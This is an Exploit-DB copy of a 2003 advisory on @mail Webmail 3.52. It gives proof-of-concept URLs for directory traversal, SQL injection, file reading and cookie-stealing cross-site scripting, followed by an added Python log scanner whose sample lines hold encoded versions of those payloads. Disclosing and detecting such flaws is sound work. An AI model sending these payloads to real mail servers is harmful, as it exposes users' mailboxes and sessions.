calacode @mail webmail system 3.52 - Multiple Vulnerabilities

EDB-ID: 23421
CVE: N/A
Platform: CGI
Date: 2003-12-09


source: https://www.securityfocus.com/bid/9180/info

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

http://www.example.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1

http://www.example.com/parse.pl?file=html/english/xp/xplogin.html

http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>
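
A log-review check for the request patterns listed above, added here as an example and not part of the original advisory: it scans web access-log lines for traversal sequences, quote characters, and script tags in the Folder/folder parameter of showmail.pl and reademail.pl. The log format, sample lines, label names, and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter names come from the request URLs on this page.
WATCHED = {"showmail.pl": {"folder"}, "reademail.pl": {"folder"}}

# Labels are this example's own naming; a lone quote is a triage signal, not proof.
CHECKS = [
    ("directory-traversal", re.compile(r"\.\.[/\\]")),
    ("sql-metacharacter", re.compile(r"'")),
    ("script-injection", re.compile(r"<\s*script", re.I)),
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (common-log style), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Dec/2003:10:00:00 +0000] "GET /showmail.pl?Folder=Inbox HTTP/1.0" 200 5120',
    '192.0.2.11 - - [09/Dec/2003:10:01:00 +0000] "GET /showmail.pl?Folder=..%2F..%2Fuser%40example.org%2Fmbox%2FInbox HTTP/1.0" 200 8841',
    '192.0.2.11 - - [09/Dec/2003:10:02:00 +0000] "GET /reademail.pl?id=1&folder=x%27%20or%20a%3D%27b&print=1 HTTP/1.0" 200 2300',
    '192.0.2.12 - - [09/Dec/2003:10:03:00 +0000] "GET /showmail.pl?Folder=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.0" 200 4100',
]

def classify(target):
    """Return sorted labels for suspicious watched parameters in a request target."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    params = WATCHED.get(script)
    if not params:
        return []
    hits = set()
    # parse_qsl percent-decodes, so %27 and ..%2F are checked as ' and ../
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in params:
            hits.update(label for label, rx in CHECKS if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Yield (line_number, labels) for access-log lines that match a check."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            labels = classify(match.group(1))
            if labels:
                yield number, labels

if __name__ == "__main__":
    for number, labels in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(labels)}")
```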